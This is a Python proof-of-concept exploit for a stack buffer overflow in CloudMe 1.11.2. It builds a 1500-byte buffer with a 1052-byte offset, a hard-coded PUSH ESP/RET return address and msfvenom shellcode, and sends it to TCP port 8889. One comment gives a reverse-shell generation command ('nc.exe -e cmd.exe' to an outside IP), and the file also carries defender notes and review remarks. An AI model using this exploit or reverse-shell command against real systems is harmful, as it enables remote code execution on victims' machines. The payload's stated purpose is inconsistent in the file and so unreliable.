# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86
#Instructions:
# Start the CloudMe service and run the script.
"""Stack buffer overflow proof-of-concept against CloudMe 1.11.2.

What the script does, as written below: it builds one 1500-byte buffer and
sends it over a single TCP connection to 127.0.0.1:8889, then exits. The
buffer layout is

    1052 x 0x90 | 4-byte return address (0x68A842B5, little-endian) |
    30 x 0x90 | msfvenom-encoded shellcode | 0x43 filler up to 1500 bytes

The 4-byte value is written where the saved EIP is expected to be, so the
overflow offset this PoC assumes is 1052 bytes.

Defender notes:
  * The only network artefact is one connection to TCP/8889 carrying ~1500
    bytes that are mostly 0x90 (NOP) and 0x43 ('C') filler; a crash of the
    CloudMe process immediately after such a connection is the host-side
    symptom.
  * The return address is hard-coded. The original comment says it is a
    PUSH ESP / RET gadget but does not say which module it lives in; a
    fixed address like this only works if that module loads at the same
    base every run (i.e. is not randomised).
  * Mitigation is to move off 1.11.2 to a release that fixes the overflow;
    the page does not state which release that is.
"""

import socket

# The PoC only ever talks to the local machine.
target = "127.0.0.1"

# Filler that reaches the saved return address on the stack (1052 bytes).
padding1 = b"\x90" * 1052
# Little-endian encoding of 0x68A842B5; per the original comment this is a
# PUSH ESP / RET gadget that redirects execution into the NOPS below.
EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
# Small NOP sled between the gadget and the shellcode.
NOPS = b"\x90" * 30

# NOTE(review): two msfvenom command lines appear around this blob (the one
# below and the calc.exe one after it) and they disagree about what was
# encoded. The bytes cannot be verified from this file alone; treat both
# comments as unconfirmed descriptions of the payload.
#msfvenom -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe -e cmd.exe 10.10.14.192 1338' -b '\x00\x0A\x0D' -f python
payload = b""
payload += b"\xb8\x17\xe4\x16\xfc\xdd\xc1\xd9\x74\x24\xf4\x5a\x29"
payload += b"\xc9\xb1\x3e\x83\xc2\x04\x31\x42\x11\x03\x42\x11\xe2"
payload += b"\xe2\x18\xfe\x7e\x0c\xe1\xff\x1e\x85\x04\xce\x1e\xf1"
payload += b"\x4d\x61\xaf\x72\x03\x8e\x44\xd6\xb0\x05\x28\xfe\xb7"
payload += b"\xae\x87\xd8\xf6\x2f\xbb\x18\x98\xb3\xc6\x4c\x7a\x8d"
payload += b"\x08\x81\x7b\xca\x75\x6b\x29\x83\xf2\xd9\xde\xa0\x4f"
payload += b"\xe1\x55\xfa\x5e\x61\x89\x4b\x60\x40\x1c\xc7\x3b\x42"
payload += b"\x9e\x04\x30\xcb\xb8\x49\x7d\x82\x33\xb9\x09\x15\x92"
payload += b"\xf3\xf2\xb9\xdb\x3b\x01\xc0\x1c\xfb\xfa\xb7\x54\xff"
payload += b"\x87\xcf\xa2\x7d\x5c\x5a\x31\x25\x17\xfc\x9d\xd7\xf4"
payload += b"\x9a\x56\xdb\xb1\xe9\x31\xf8\x44\x3e\x4a\x04\xcc\xc1"
payload += b"\x9d\x8c\x96\xe5\x39\xd4\x4d\x84\x18\xb0\x20\xb9\x7b"
payload += b"\x1b\x9c\x1f\xf7\xb6\xc9\x12\x5a\xdd\x0c\xa1\xe0\x93"
payload += b"\x0f\xb9\xea\x83\x67\x88\x61\x4c\xff\x15\xa0\x28\x0f"
payload += b"\x5c\xe9\x19\x98\x38\x7b\x18\xc5\xbb\x51\x5f\xf0\x3f"
payload += b"\x50\x20\x07\x5f\x11\x25\x43\xd8\xc9\x57\xdc\x8c\xed"
payload += b"\xc4\xdd\x85\xad\xd0\x7d\x5d\x53\x48\x0e\xed\xcf\xfa"
payload += b"\x9a\x69\x9f\x99\x11\x2d\x38\x27\xbb\x91\xb3\xa7\x2f"
payload += b"\x46\x5d\x2c\xec\xf6\xfe\x82\x69\x7e\x64\xfb\x5c\x1b"
payload += b"\x46\x98\xf3\x87\xa8\x3b\x74\x22\x95\xf2\xb4\x82\xe4"
payload += b"\xc4\x9a\xeb\x32\x0b\xd2\x32\x09\x73\x25\x77\x5e\x4b"
payload += b"\x45"
#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python

# Pad the whole request to exactly 1500 bytes with 'C' (0x43). If the pieces
# ever exceed 1500 bytes this multiplier goes negative and yields b"".
overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))

# Final request: filler, overwritten return address, NOP sled, shellcode, pad.
buf = padding1 + EIP + NOPS + payload + overrun

try:
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target,8889))
    # send() may write fewer bytes than len(buf); its return value is not
    # checked here, and the socket is never explicitly closed.
    s.send(buf)
except Exception as e:
    # NOTE(review): every connect/send failure is reduced to this one word;
    # the exception object `e` is never used, so the cause is lost.
    print("RIP")